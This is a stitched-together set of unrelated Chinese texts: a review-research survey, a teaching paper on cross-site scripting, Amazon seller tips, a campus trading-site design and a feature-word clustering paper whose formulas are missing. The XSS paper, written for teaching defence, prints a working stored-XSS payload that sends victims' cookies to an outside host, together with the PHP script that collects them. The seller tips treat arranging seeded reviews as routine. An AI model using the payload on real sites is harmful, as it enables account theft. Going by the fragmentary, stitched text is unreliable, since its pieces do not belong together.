Mudambi和Schuff(2010)從信息經濟學中信息的診斷性角度定義了評論信息質量。早期的評論信息質量的評價并不局限于文本評論,但隨著研究者對評論內容特征的關注,評論質量越來越多用來反映文本評論內容對瀏覽者的信息參考價值。正如上文中提到對于文本評論而言評論質量包含真實性、可靠性、相關性、有用性四個方面。借鑒技術接受模型TAM中人們接收新技術會受到對新技術感知有用性的影響這一思路,評論質量中關于評論有用性的評價指標更加受到重視,并成為判斷評價信息功能的主要研究變量。早期的評論有用性研究將評論星級及評論長度作為評論有用性的衡量指標,其好處是指標簡單,易量化。后期產品評論研究的重點轉向文本內容認知,對于文本內容有用性的劃分采用了評論長度和可讀性兩個維度來衡量,有的研究中也將評論有用性定義為評論感知價值(Schindler&Bickart,2012)。由于當前對文本內容分析的方法是基于文本語義屬性的挖掘方法,對于在線產品評論相關特征的數據采集和統計大都是通過網絡信息搜索軟件實現,因此目前評論有用性的衡量通常是用網站中評論有用性的排名數據統計來替代。但是并不是所有購物網站的評論系統中都會設置評論是否有用這一瀏覽者打分機制,并且受到文化的影響,即便網站設置了這一功能,國內的消費者也沒有去給評論打分的習慣。因此這種衡量方式的有效性也一直受到爭議。
研究中與評論有用性常常共同出現的一個衡量評論的功能的變量就是評論的可信度。由于在交流有關研究領域發現可信度與勸說性之間的強相關,可信度被用來作為評論信息是否對潛在消費者態度以及行為有強的勸說性的衡量指標。從信息傳播的角度來說,信息源、消息和接受者是信息評價的3個主要的信息元素。因此相比于有用性,在線評論的可信度更強調從評論強度、信息源的可信度、評論間的一致性、評論累積排名等維度來度量,從已有的研究文獻來看,其中又主要側重于對信息源可信度的判斷,也就是對評論者的可信度的判斷(Cheung等,2009)。Lis(2013)將信息源的專業度和值得信任程度作為信息源可信度的衡量標準和評論排名一起作為評論可信度的決定因素,其中值得信任程度中包含評論內容的質量、與其他評論的一致性以及其他消費者對評論的認可這幾個方面。因此,評論可信度與評論有用性是有交叉又各有側重的兩個研究變量。研究者會根據研究方法以及目標選擇其中合適的變量作為對評論功能的衡量。不過由于目前側重于文本評論數據挖掘的研究方法所限,還是以有用性的排名統計作為評論價值功能的衡量更多見。
其他還有一些研究變量,比如將瀏覽者看完評論信息以后持有的態度作為衡量評論功能實現的衡量指標,比如對產品的購買意愿、感知的產品質量、滿意度、忠誠度等(Reyes A & Rosso P,2012;Chang & Yen,2013),以及直接用企業經營數據,比如產品的銷量、企業收入、公司股價來作為評論的作用,不過后兩者多用于第三方評論或者公眾輿論有關的評論效果研究中,與在線產品評論有關的經營數據最主要的還是被評論產品的銷量數據(Sonnier等,2011)。
三、在線產品評論分析技術
在線評論信息挖掘研究集中在信息系統、電子商務管理科學等領域。近幾年,在線評論信息挖掘日益成為在線產品評論研究的熱點,由于文本挖掘技術的研究進展還處于不太成熟的階段,各領域中計算機科學和信息科學領域對文本挖掘技術的研究居多。文本挖掘技術和自然語言處理等技術現在已經能對半結構化和非結構化數據進行挖掘,在線評論的表現形式為數量眾多且非結構化的文本,但是如何提高對在線評論的挖掘精確度也一直是技術研究領域關注的焦點。目前,在挖掘技術上的研究集中于信息抽取、情感分析和文本分類這三類主流研究方法。信息抽取是情感分析的基礎,同時信息抽取和情感分析又是文本分類的基礎。信息抽取主要是通過對評論中描述產品性能或功能的名詞或短語進行關鍵詞的抽取,情感分析是通過語義分析對評論中需要聯系上下文才能理解評論者表達效價進行情感傾向的判斷,挖掘出的信息結果包括抽取的主題特征 (價格、質量、外觀等)、情感傾向 (正面、中立、負面)、文本類別(主題和情感類別)。以情感分析為例,當前所廣泛采用的文本語義屬性分析的挖掘方法是不夠成熟的,無論是詞語極性推測法、點互信息法、抽取主觀表達式法還是構造情感詞典法,都是基于文本內容字面信息的加工和處理,而文本內容所包含的潛在信息卻是無法挖掘的,如說話人的語言風格所反映出的評論人所屬的用戶群體或專業程度等,因此僅從字面來進行情感傾向的判斷存在一定的不精確性。
但是也有越來越多的學者在信息抽取和文本挖掘的基礎上從實證研究角度對在線評論的有用性、對消費者態度以及商家銷量的影響等進行研究。有學者利用主題特征信息抽取技術從在線評論中抽取產品特征和主題信息,并以此研究發現評論中消費者提及最多的產品主題特征并不一定對他們的滿意度影響最大(You WJ,et al.2012)。Cao等(2011)運用潛在語義文本分析文本挖掘法(LSA)應用logit回歸模型研究了評論星級、評論時間、評論字數、評論中包含的句子數、語義特征(評論中的情感傾向)對評論有用性投票數的影響,經過發現評論的語義特征對評論有用性影響最大。Min和Park(2012)從評論者經驗這一角度出發應用文本挖掘和實證分析方法研究如何根據評論者經驗識別出高質量評論。還有研究者通過對手機評論進行情感分析,識別手機是否存在過度的功能設計并以此獲得更多的顧客滿意度來提高銷售績效(Liu P,et al.2010)。未來隨著文本挖掘技術的進步,分析精確性不斷提高,相信這類結合實證方法證明在線產品評論商業應用效果的研究也會越來越多并得出更有價值的結論。
四、結語
綜上所述,在線產品評論現階段為止的研究有以下三個方面的特點:第一,研究中關于在線產品評論的一般特征,內容特征,評論者特征等等這些特征形式早期研究較多。雖然在研究發展過程中會出現不同程度的交叉重疊和所屬類別上的變化,但隨著購物網站評論體系設置的成熟化,這些特征形式基本穩定下來,并且主要的特征屬性都集中在評論文本的特征描述中,這也說明了文本評論的重要作用。因此,現階段的研究主要集中于評論文本內容的深度挖掘帶來的新的特征屬性;第二,文本挖掘技術和自然語言處理等技術現在已經能對半結構化和非結構化數據進行挖掘,而在線評論的表現形式為數量眾多且非結構化的文本,如何提高對在線產品評論的挖掘精確度也一直是技術研究領域關注的焦點。正因為文本挖掘技術的研究進展還處于不太成熟的階段,現階段的挖掘主題比較少,情感分析精度也不夠高,因此其他領域即便將現有挖掘技術應用于實證研究中,也難以得到穩定的和有價值的結論。相信未來隨著文本挖掘技術的進步,這類結合實證方法證明在線產品評論商業應用效果的研究也會越來越多,并得出更有價值的結論;第三,在商業應用研究領域,如何選取合適的研究變量和指標,比如消費者行為變量及觀測指標來與文本挖掘技術得到的計量數據相結合,從而實現更準確有價值的實證研究,也是在研究方法上需要繼續探索和解決的問題,比如目前用網站評論有用性的排名數據統計來替代評論有用性度量的方式過于單一且準確性受到質疑。
另外,還有兩個在線產品評論研究中比較集中的主題未來也可能會繼續發展:一個是購買者參與評論的動機及其在社交網絡中的作用;另一個是對購物網站上越來越多出現的虛假評論現象的研究,目前的研究集中在虛假評論的識別以及其影響方面,未來隨著消費者的經驗增加以及網站成熟運作,這方面的研究還會有新的熱點出現。
主要參考文獻:
[1]李恒.在線評論特征的維度綜述[J].企業技術開發,2015.1.
[2]李宏,喻葵,夏景波.負面在線評論對消費者網絡網絡購買決策的影響,一個實驗研究[J].情報雜志,2011.5.
[3]龔思蘭,丁晟春,周夏偉,巢乃鵬.在線商品評論信息可信度影響因素實證研究[J].情報雜志,2013.32.11.
[4]宋曉晴,孫習祥.消費者在線評論采納研究綜述[J].現代情報,2015.1.
[5]羅彪,叢日飛.留、傳、搜、用:消費者行為視角下的電子口碑研究綜述與展望[J].外國經濟與管理,2015.37.8.
[6]You WJ,Xia M,Liu,L,et al.Customer knowledge discovery form online reviews[J].Electron Markets,2012.7.7.
(廣東外語藝術職業學院,廣東 廣州 510640)
【摘 要】高職院校的網絡安全類課程教學中,需要學生既具有扎實的基礎理論知識,又要求在教學中給學生提供一個模擬或者真實的操作環境幫助學生全面的掌握網絡安全知識。如何防范跨站腳本攻擊是當前網絡安全工作中的一個重要課題,本文結合了日常教學的經驗,在詳細分析跨站腳本攻擊原理的基礎上,在php+mysql環境上搭建出一個真實的實驗環境,幫助學習者深刻理解跨站腳本攻擊的相關知識,并學會如何進行有效防范。
關鍵詞 跨站腳本攻擊; 網絡安全; 實驗平臺
【Abstract】The students in vocational college are required to have enough knowledge about the principle of network security, and an experimental platform is also needed to help students lean network security. Cross Site Script(XSS) attack and defense is an important subject in network security field. An experimental platform is developed to help learner understand about XSS attack and defense, and the principle of XSS attack and defense is also analyzed. The platform is developed using php+mysql tools. This article is based on the author’s regular teaching experience.
【Key words】Cross site script attack; Network security; Experimental platform
跨站腳本攻擊在各種網絡安全漏洞中,一直被OWASP(Open Web Application Security Project) 組織評為十大安全漏洞中的第二威脅漏洞。2011年,國內最熱門的信息平臺“新浪微博”爆發跨站腳本攻擊,僅持續16分鐘,感染的用戶就達33000個,可見其危害之大。
高職院校的《網絡安全與防范》課程也把跨站腳本攻擊作為一個重點的教學內容。為了讓學生充分掌握跨站腳本攻擊的防范方法,就必須透徹的了解跨站腳本攻擊的原理和具體的實施過程。
我們開展了一項課題,旨在搭建一個網絡攻防的應用平臺,幫助學習者更深刻的理解各種網絡攻防的原理和了解其實施的步驟,以采取更高效的防范措施,來杜絕網絡攻擊的產生。跨站腳本攻擊就是其中的一項任務。
本文中,我們會對跨站腳本攻擊進行詳細的分析,并結合搭建的網絡平臺重建攻擊過程,并提出防范方法。
跨站腳本攻擊是由于網站的后臺系統對用戶的輸入過濾不嚴而產生的。攻擊者利用這一點把惡意代碼加入到網站的后臺系統中(通常是網頁之中),當用戶瀏覽這些網頁時,那些隱含在正常網頁中的惡意代碼就會在用戶的機器中得以執行,從而達到各種攻擊用戶電腦的目的。
為了理解跨站腳本攻擊,有必要先了解用戶訪問一個沒有惡意代碼的簡單網頁的過程。訪問如圖 1所示的一個網頁,用wireshark工具進行網絡數據的捕獲。
總共捕獲到兩個數據包,一個是瀏覽器發送給網站的請求數據包,其內容如圖 2:
在請求數據包中,比較重要的一個字段是cookie字段,其具體內容記錄了用戶平時登錄各種網站的賬號和密碼信息。跨站腳本攻擊往往會通過這個字段獲取到用戶的賬號等重要信息。
網站回送給瀏覽器的響應數據包如圖 3:
在響應數據包中,除了一些頭信息外,還附帶上了網頁的內容。可見,一個基本的網頁訪問過程就是由一個請求數據包和響應數據包組成的。
接下來,在我們搭建的實驗平臺上,對一個網站進行跨站腳本攻擊,以實現一個不斷彈出的窗口,迫使正常的網頁瀏覽無法繼續下去。在一個存在有漏洞的商品評價網頁中,通過對商品添加評價進行攻擊。如圖 4:
在評論內容里面,寫下如下的代碼:
<script>while(true) alert(/You have been XSS attacked!/) </script>,
發表評論后,當其他用戶登錄網站,通過點擊“查看該商品評論”查看評論時,就會出現如圖 5所示的情況:
并且無論點擊多少次“確定”按鈕,都無法關閉此彈出窗口,表明此用戶已經受到了跨站腳本攻擊。打開由網站傳送回來的網頁源代碼,可以發現這樣一句代碼:“<script>while(true) alert(/You have been XSS attacked!/) </script>”,這段代碼已經入到網頁中,當瀏覽器解析到這一段代碼時,因為“<script>”標簽的原因,標簽對里面的內容會被解釋執行,而不是作為對商品的評論原封不動的顯示在頁面上。通過查看網站后臺數據庫,發現如圖 6所示的語句已經被寫入了數據庫:
當其他用戶查看此商品的評論時,此條記錄被讀出,并插入到網頁中,從而形成了跨站腳本攻擊。
另外一個跨站腳本攻擊的案例是盜取用戶的登錄賬號和密碼。
用戶“qy1”在如圖 7所示的網頁中進行登錄后:
在用戶的機器上會保留一個cookie,里面記錄了用戶登錄時輸入的賬號和密碼。可以通過在用戶的瀏覽器的地址欄輸入語句“javascript:alert(document.cookie)”來顯示出賬號和密碼,如圖 8所示:
可見用戶的賬號和密碼都保存在了用戶的計算機中。通過跨站腳本攻擊可以在攻擊者的機器上獲得用戶的賬號和密碼。
攻擊者a在某一個商品的評論中發表如圖 9所示的內容:
其中,評論內容中輸入的是: “<script>var ck=document.cookie;var url=\’kaikaixinxin.net/qlunwen1216/jieshoucookie.php?zhanghao=\’+ck;var daima=\´<iframe width=0 height=0 src=\"\’+url+\’\"></iframe>\’;document.write(daima);</script>”。
當用戶“qy1”登錄網站查看這一個評論時,其賬號和密碼就會發送到攻擊者a所指定的機器上,并存儲在“cookie.txt”文件中,其中的內容如圖 10:
由此攻擊者就利用跨站腳本攻擊獲取到了被攻擊者的賬號和密碼等重要信息。
分析此次跨站腳本攻擊,攻擊者在商品評論里面并沒有寫入評論性的語句,而是寫入了一段javascript代碼,這段代碼并沒有經過過濾就被寫到了網站的后臺數據庫中,如圖 11:
當受攻擊者瀏覽這個商品的評論時,這段代碼沒有經過任何過濾就被傳送給了瀏覽器,而瀏覽器當解析到<script></script>所包括的語句時,會認為這是一段javascript語句,會執行語句中的內容。而這段代碼的作用就是讀取被攻擊者機器上所存儲的cookie信息,并且把此信息發送給攻擊者所指定的網站的指定接收頁面。我們再來看,這個接收頁面的內容如下:
<?php
$cookie=$_GET[´zhanghao´];
$cookierec=fopen("cookie.txt","a");
fwrite($cookierec,$cookie."\n");
fclose($cookierec);
?>
其作用就是接收被攻擊者發送過來的賬號信息,并把它存儲在文件“cookie.txt”里面。
被攻擊者的機器在不知不覺中向攻擊者指定的機器發送了數據包,其內容如圖 12:
數據包中的GET語句包括了用戶的賬號等重要信息。
到此為止,一個詳細的跨站腳本攻擊過程就已經詳細的展現出來。如何防止此種跨站腳本攻擊呢。通過分析以上攻擊過程,發現實現此類攻擊,要具備以下條件:
(1)網站存在供用戶輸入數據的頁面,類似留言板,商品評論,搜索框等。
(2)用戶瀏覽了被攻擊者惡意修改過的網頁。
(3)用戶的機器允許執行這些惡意代碼。
(4)網站沒有對用戶的輸入內容進行有效的過濾,即過濾掉那些攻擊性的代碼,并且在輸出用戶的評論或者搜索內容時也沒有進行過濾。
對于以上的第一點,由于現在絕大多數網頁都會有和用戶交互的需要,所以給用戶輸入信息的功能,不能取消。
對于第二點,用戶可以提高警惕,對于一些非法網站,盡量不要去訪問。
對于第三點,用戶可以禁止瀏覽器的活動腳本的執行,可以如圖 13設置:
對于第四點,要求網站開發人員對用戶的輸入信息進行過濾,過濾掉惡意的代碼。或者在輸出時進行過濾,過濾掉惡意代碼。
例如,可以建立一個如下的函數:
function unhtml($content){
$content=str_replace("&","&",$content);
$content=str_replace("<","<",$content);
$content=str_replace(">",">",$content);
$content=str_replace(" ," ",$content);
$content=str_replace(chr(13),"<br>",$content);
$content=str_replace("\\","\\\\",$content);
$content=str_replace(chr(34),""",$content);
return $content;
}
利用此函數把”<” ,”>”, “&”等字符轉化為<, >, &等字符。這樣瀏覽器在輸出時,遇到<, >, &等字符時,就會在網頁上顯示”<” ,”>”, “&”等字符,而不會把這些字符對中所包含的內容當作可運行的代碼進行執行了。
在實驗平臺的網站后臺頁面代碼中加入unhtml函數,例如在顯示商品評論的網頁showpl.php中加入如下代碼
<?php echo unhtml($info1[content]);?>
成功對商品評論中的輸出內容進行了過濾,避免了跨站腳本攻擊,用戶看到的輸出結果如圖 14:
結論:
為了讓學習者理解如何防范跨站腳本攻擊,搭建了一個基于php+mysql的實驗平臺,在對跨站腳本攻擊進行了原理上的詳訴后,對攻擊中的每個步驟進行了模擬,每一步的模擬都是一個真實攻擊的再現。最后,講解如何防范跨站腳本攻擊,對于后臺防范代碼做了詳解,演示了防范后的效果。我們搭建的實驗環境讓學習者不再局限于對跨站腳本攻擊原理上的了解,而是有了一個實操的環境,極大的提高了學習者的學習興趣,增加了學習效率。基于我們搭建的實驗平臺,將來還可以開展更多的實驗。
參考文獻
[1]趙彬.黑客攻防Web安全實戰詳解[M].北京:中國鐵道出版社,2014.
[2]肖遙.大中型為了入侵要案直擊與防御[M].北京:電子工業出版社,2011.
我的選品思路:市場容量不是很大真的不怕,最重要是找對趨勢和有發展空間,因為現在亞馬遜的產品暴利期一般也只有約3-9個月。都是斗快抓機會做中前期。說實話我做過的爆款都沒用軟件去細看每一項數據如關鍵詞搜索量,預估銷量等,真不宜花太多時間做太多技術性的分析,否則是很容易錯過機會。
我看關鍵數據:看產品評論(Review)有否快速增長就可以確定產品是否有跡象在爆發,因為Review是亞馬遜出單核心,而且Review增長快代表最近有一定銷量支持,相反不用太執著銷售排名(Best Sellers Rank),一來變化大,二來排名高的都被數以萬計賣家關注,想找下一個爆款肯定是看一些現在被低估或不是太顯眼的,可以告訴你大類目銷售排名就算去到1萬多的實際都有機會火起來,大類目排名5百至1萬的都是理想范圍。當找到目標產品后再確認一下對手數量及Review都沒太多后,就用最短時間把產品發FBA上架再做測評
review可能有不少是假的?這是無可否認,但相對而言,操作假銷量的成本是更低,一些商家可以天天一個listing刷50個銷量,把銷售排名撐到很高,這樣如果我們太聚焦在銷售排名就可能更容易出現誤判,是非常影響大家分析市場的。所以相對之下我會比較看重review變化。而且虛假review實際上亞馬遜都一直有刪,力度更愈來愈大,相信review參考性只會愈來愈高。
過往月銷數萬美金listing的共通點和運營大方向:自建Listing,以單一Listing銷量最大化做方針 (不鋪貨,有利資金,資源控制),產品單價約$20-$60美金發FBA(從頭到尾都用FBA)-不依賴站內廣告出單(過往廣告產生的訂單不超過總訂單5-10%)-沒有做站外引流(亂引流有可能大幅降低轉化率,繼而令搜索排名大幅下降,對listing傷害很大)-不用常常修改listing或關鍵詞,核心關鍵詞一般就3-5個,參考亞馬遜搜索框提示,競品標題或google adwords關鍵詞工具已經足夠-Listing和說明書別照搬廠家的標準文本,最好找專業的編寫或讓老外寫,一來影響轉化率,二來老外看到抓頭的時候別怪吃一堆負評和退貨-多改良包裝,盡量弄小一點丶穩固一點和劃算一點,要盡量降低運費成本和壞貨率,不信買個Anker移動電源看一下他們包裝怎麼弄就懂-多調控物流時間,如空運要長期達成約3-4天內到美國亞馬遜倉庫-多調控產品開發至上架所需的時間,包括設計丶生產包裝,設計Listing,訂貨,打包產品,找測評等每一環節都要探討可改善加快之方法-有空多準備替代方案,包括備用的物流公司,包裝廠,產品廠家。因為只要當中一個環節出問題令你延遲1-2星期發貨,即時已損失一些錢,更重要是如果開賣後FBA斷貨1-2星期,Listing是有機會被亞馬遜嚴重降權,流量和單量都會持續明顯下降,有時候Listing更可以直接報廢,相信有不少大賣家也嘗過。所以能調控好以上說的,每次上新Listing就能提前開賣幾個星期,配合一開始選好在爆發中的產品,就能占盡先機。當然還有一些細節如怎麼建一個具優勢的Listing或可運用什麼有效的銷售策略?亞馬遜平臺內有什麼重要的規則/技巧等等,這些都掌握好銷量才能最大化。這些下一次再跟大家分享。
關鍵詞:物品交易;三層結構;.NET
中圖分類號:TP311文獻標識碼:A文章編號:1009-3044(2011)27-6583-01
近年來,隨著高校擴招,我院在校生規模的也在不斷擴大。由此,間接催生了學生對用品的需求。據統計,我院學生大都家庭狀況不太富裕,他們的消費水平普遍較低,因此二手學習生活用品對其而言,則相對顯然經濟實惠。所以學院社團也會不定期地組織跳蚤市場,但這遠遠不能滿足學生需求。在信息化的時代,建立校園物品交易平臺,必將成為一種新型的學生交易方式。給學生帶來無窮的方便。在這個平臺,所有學生都可以注冊登錄在上面購買自己需要的物品。網站將以物品列表的形式的向所有訪客展示這些信息。
1 系統的體系結構
本系統根據軟件體系的結構,結合本系統的設計特點,采用三層結構設計作為系統框架,系統的邏輯體系設計如圖1所示。
通常意義上的三層架構就是將整個業務應用劃分為:表示層(UI)、業務邏輯層(BLL)、數據訪問層(DAL)。
1) 表示層(UI):用于顯示數據和接受用戶輸入的數據,為用戶提供一種交互式操作界面。、
2) 業務邏輯層(BLL):只要負責數據的傳遞和處理。
3) 數據訪問層(DAL):主要實現對數據的保存和讀取操作。
2 系統功能模塊設計
本系統采用 技術,基于Microsoft SQL Server 2005 數據庫系統的數據管理使該系統有更高效的性能。系統的基本功能如圖2所示。
系統有4種用戶類型,各種用戶所涉及到得功能有所不同:
1) 游客的主要功能有:搜索商品、按類別查看商品、查看商品信息、查看商品評論、查看熱門商品、查看所有店鋪、查看店鋪中商品、查看校園新聞、看到“關于我們”中的信息;
2) 普通用戶的主要功能有:用戶注冊、用戶登錄、商品評價、商品留言、查看店主信息、給管理員留言、修改用戶注冊信息;
3) 開店用戶的主要功能有:免費開店、快速搜索自己的店鋪、修改店鋪信息、上傳商品、店鋪過期商品處理、商品留言回復、管理店鋪商品、延期過期商品;
4) 管理員的主要功能有:用戶管理、店鋪管理、商品管理、評論管理、新聞管理、給管理員的一封信、物品回收站、廣告管理;
3 系統功能的實現
數據庫設計主要涉及14張數據表,分別為管理員表、評論表、商品類別表、留言表、新聞表、商品過期時間表、回收站表、商品表、店鋪表、學生信息表、給管理員一封信表、用戶信息表、用戶狀態表、用戶類型表。要求每天下班前自動備份數據庫到另外一個硬盤上以提高數據的安全性。對數據庫讀寫、刪除操作最直接的實現方法是客戶端程序通過數據庫接口程序直接對數據庫進行操作。
用編寫的動態Web網頁時,如果考慮不夠周全,安全意識不強,會造成程序不夠穩健,再加上數據庫本身存在的安全漏洞,用戶有意或無意的交互,就可能會成為網站的攻擊事件。為了防止這些情況的發生,本系統采用了身份驗證與授權、使用Parameters參數防止SQL攻擊以及MD5加密等安全技術。
4 結束語
很多院校提倡綠色教育,首先要體現在校園文化上,通過學生物品交易平臺的有效實施,將會大量減少墻壁污染和廣告垃圾,同時促使了學生物品的循環使用,減少不必要的浪費。
在完成系統過程中本熱收獲了很多,同時也認識到自己的不足,尤其是自己開發的物品交易平臺有很多是需要完善的地方。平臺要繼續增加好友功能,用戶可在線聊天交友、查詢資料等。
參考文獻:
[1] 金永濤.基于.NET框架的Web應用系統安全問題研究[J].北華航天工業學院學報,2009(6).
[2] 張玉麗框架下工作流管理系統的研究與應用[D].青島:中國海洋大學,2008.
[3] 郝冠軍本質論[M].北京:機械工業出版社,2011.
關鍵詞: 產品特征; 語義相似度; 聚類算法; 觀點挖掘
中圖分類號: TN911?34 文獻標識碼: A 文章編號: 1004?373X(2017)14?0081?04
Abstract: Aiming at the problem of the various product feature expressions existing in user reviews, it′s necessary to cluster the product feature words in the task of fine?grained opinion mining. According to the calculation characteristics of different semantic similarities, a semantic similarity mixture calculation method based on semantic knowledge and context entropy model is proposed to calculate the extract the semantic similarity of feature words. The traditional CBC algorithm is improved. A CBC?LIKE method suitable for product feature words clustering is proposed. The experiment is conducted for the real review corpus in three domains. The performances of the proposed semantic similarity calculation method and clustering algorithm are analyzed. The experimental results show that the method is effective, its performance is better than that of other two benchmark methods, which has perfect effect.
Keywords: product feature; semantic similarity; clustering algorithm; opinion mining
產品評論領域中的細粒度意見挖掘旨在深入到產品特征層面,產品特征包含商品本身、商品的部件和屬性、以及屬性的特征等[1?2]。比如下面評論句子:I browsed the [pictures] in the computer, and found the [photos] were perfect and the [resolution] was high。其中方括號括起來的是相機這一領域產品評論的特征,而下劃線的詞語是針對該特征用戶表達的觀點。由于用戶發表評論時通常具有很大的自由度和隨意性,并且不同用戶的表達習慣也并不相同,因此,用戶評論文本呈現出高度的隨意性和不確定性特點。例如在數碼相機領域中,不同用戶可能分別采用“picture quality”和“image clarity”表示“照片”特征,而相機產品評論中提到的“picture”,“image”和“photo”這三個特征表示的是同一特征[3?4]。針對產品特征詞聚類問題,本文在完成特征抽取任務的基礎上,結合不同的語義相似度計算的特點,提出基于語義知識和基于上下文熵模型的語義相似度混合計算方法,計算抽取得到的特征詞的語義相似度,然后提出CBC?LIKE聚類方法完成特征詞集合的聚類任務。最后對來自于三個領域的真實評論語料上的仿真實驗結果表明,本文提出的方法對特征詞的聚類效果是有效的,優于另外兩種基線方法。
1 產品特征詞聚類
1.1 混合特征詞語義相似度計算
本文采用基于三種語義相似度計算的混合計算方法用于特征聚類。
(1) 對產品特征的表達往往會共享同樣的詞[5]。比如,“LCD screen”, “LCD viewfinder”,指的都是同樣的產品特征“display”,這時,screen和viewfinder具有相同的含義,所以對共享詞相似度的計算公式如下:
(2) 基于WordNet[6]的語義相似度量方法,常用Jiang & Conrath算法[7],其計算方法如下:
式中:LCS表示和之間的最小公共包含(Least Common Subsumer);IC表示信息量;是一個常量,表示WordNet的名詞分類中概念總數。比如,本文實驗中計算的產品特征“image”和“photo”語義相似度為0.744,而“image”和“battery”計算結果為0.221。
(3) 基于詞典的方法的局限在于詞典容量有限,語義覆蓋程度不足[8]。所以本文進一步引入基于上下文熵的方法計算詞的相似度,計算方法如下:
式中:,分別表示分布上下文中出現的特征詞;,其中,和表示當前詞的左上下文向量和右上下文向量[9],上下文向量中的每個維度用TF?IDF作為向量值。,之間的距離可以通過它們的左右上下文分布的KL?divergence之和計算得到[10]。因為兩個特征詞分別都有其對應的左邊上下文向量和右上下文向量,所以將兩個相加計算得到,如下:
式中:和分別表示第維的詞出現在特征詞和的左(右)上下文向量中的概率權值;表示向量的維度。
最后,本文對基于上述三個語義相似度度量方法相結合,得到最終的相似度計算公式:
式中,和分別為語義相似度計算方法的權重,本文根據多次重復實驗結果取值分別為0.7和0.4,實驗中也對不同的語義相似度計算方法對聚類結果產生的影響進行了分析。
1.2 基于CBC算法的產品特征聚類
CBC算法[11]由Pantel等人提出,其基本思想是首先根據待聚類數據集中的數據緊湊度形成若干簇,然后采用遞歸的方法將高質量的候選聚類簇形成真正的中心,刪除與其沖突的候選中心,待所有聚類中心確定后,計算殘余元素與聚類中心的相似度,確定其歸屬。與K?means算法只用一個元素表示聚類的思想不同之處在于,該算法通過計算簇中元素的平均距離確定聚類的質心,從而可以避免因局部最優解而導致的較大誤差,并且已被證明在根據詞的語義相似度聚類中是有效的[11]。本文對傳統CBC算法進行改進,提出CBC?LIKE算法用于特征詞的聚類任務。與原始CBC算法一樣該算法也分為三個步驟,不同的是,原始算法中需要兩個閾值進行判斷,而CBC?LIKE算法中只需要一個閾值即可,本文根據經驗設置其值為0.35。另一方面改進是原始CBC算法的聚類簇數是未知的,所以其總是盡可能構建聚類簇,但在產品特征聚類任務中,事先可以根據產品領域人工設定聚類簇數[5],比如“Battery Cluster”,“Photography Cluster”等,從而提高聚類效果。算法如下:
CBC?LIKE算法描述:
輸入: 產品特征詞集合S
聚類簇個數p
(Committee)種子成員個數q
輸出: 特征詞聚類結果C
步驟1:for each feature in S
計算語義相似度:ss(,),,屬于S且將ss(,)按降序存入集合
end for
步驟2:for each feature in S
選擇中前q個特征構成的committee:
計算 的平均相似度:
end for
將按照降序存入集合
定義C為存儲聚類中心集合的一個列表,初始化為空
for each in
if 相似度s(C,)
if 為空 then 返回 C
end if
end for
步驟3:for each residue feature
分別計算與p個committee的語義相似度
把fi并入語義相似度最近的簇
end if
2 實驗結果與分析
2.1 實驗數據集與評估指標
為測試本文提出方法的有效性,使用從亞馬遜電商網站(http:///)中收集的3個領域的語料,分別是Digital Camera,Vacuum,Cell Phone。為得到最佳標準,三個標注者對抽取的產品特征進行人工分類,從中選擇至少兩個以上相同標注者標注的標簽作為最終標注結果。表1給出了收集語料和標注結果的基本統計信息。
文中,對于特征聚類效果的評價指標使用熵值(Entropy)和純度(Purity)[6],熵值用來衡量結果與標準劃分相比的混亂程度,值越小,分類結果的混亂程度越低;純度用來衡量分類結果與標準劃分的一致性程度,值越大,分類結果的純度越高。給定產品特征詞集合FS和簇數,對該集合的最佳分類記作,聚類算法將特征詞集合FS劃分為k個獨立子集,其熵值:
式中,表示結果類中包含標準類中元素的比例。給定一組對于每個特征詞分類子集,其純度:
式中,表示結果類中包含標準類中元素的比例。另外,為評估本文提出的基于CBC?LIKE聚類方法的效果,引入K?means和基于自動標注的半監督EM方法這兩種聚類策略作為基線方法進行對比。
2.2 實驗結果及分析
為了驗證本文提出的CBC?LIKE算法中種子(committee)的個數對聚類效果的影響,實驗中設置種子個數從1~6,在三個領域語料上分別進行了5輪實驗,計算其對應的純度和熵值。實驗結果如圖1所示。隨著種子個數的增加,CBC?LIKE算法的性能首先是在增加,然后在某些點的位置上減少。這表明種子個數對產品特征聚類是有幫助的,但是隨著種子數量的增加,會隨之帶來一些噪聲信息。為了驗證本文提出的基于CBC?LIKE聚類方法的有效性,將其與其他兩個基線方法進行了比較,表2給出了不同聚類算法在三種產品領域集上Entropy和Purity值的比較結果。其中,對于特征詞之間的相似度計算采用了本文提出的三種相似度計算結合的計算方法。可以看到,與KM和EM方法相比,m然在某些領域上面CBC?LIKE方法的Entropy值和Purity值這兩個指標不占優,但是其在三種產品領域的平均Entropy值上都取得了最小值,同時平均Purity值取得了最大值,準確率上與KM算法比較,具有較為明顯優勢,這表明,本文提出的CBC?LIKE方法在聚類性能上要優于其他兩種聚類方法。
為了進一步分析不同的相似度計算對于CBC?LIKE聚類算法效果的影響。下面分別給出了基于詞典的計算方法和基于共同詞的相似度計算方法(WordNet+SW),基于上下文熵模型和共同詞的計算方法(CE+SW),本文前述的基于三種方法結合的相似度計算方法(FS),實驗結果如表3所示。從實驗結果中可以看出,采用三種相似度計算相結合的方法在最后的聚類效果上要優于另外兩種。從平均Entropy值和Purity的結果上可以看到,FS要優于前兩種方法,而CE+SW又優于WN+SW的方法,說明采用上下文熵模型對于特征詞的相似度度量方法具有較好效果,能較好地反應特征詞在產品評論中的語義關系,這個和本文實驗中對于兩個調和參數α和β的實驗性選取上是相印證的。
3 結 論
針對產品評論觀點挖掘產品特征聚類進行了研究,提出在三種不同語義相似度的混合計算方法的基礎上,用CBC?LIKE聚類算法完成特征詞集合的聚類。最后的仿真實驗結果表明,本文提出的三種不同語義相似度混合計算方法以及CBC?LIKE聚類算法能有效完成聚類任務,純度和熵值這兩個指標上的表現優于基線方法。
參考文獻
[1] BALAZS J A, VEL?SQUEZ J D. Opinion mining and information fusion: a survey [J]. Information fusion, 2015, 27(C): 95?110.
[2] HU M Q, LIU B. Mining and summarizing customer reviews [C]// Proceedings of 2004 the Tenth ACM SIGKDD International Conference on Knowledge Discovery and Data Mining. Seattle: ACM, 2004: 168?177.
[3] YU Jianxing, ZHA Zhengjun, WANG Meng, et al. Aspect ranking: identifying important product aspects from online consumer reviews [C]// Proceedings of 2011 Annual Meeting of the Association for Computational Linguistics: Human Language Technologies. Portland: Association for Computational Linguistics, 2011: 1496?1505.
[4] XU H, ZHANG F, WANG W. Implicit feature identification in Chinese reviews using explicit topic mining model [J]. Knowledge?based systems, 2015, 76(5): 166?175.
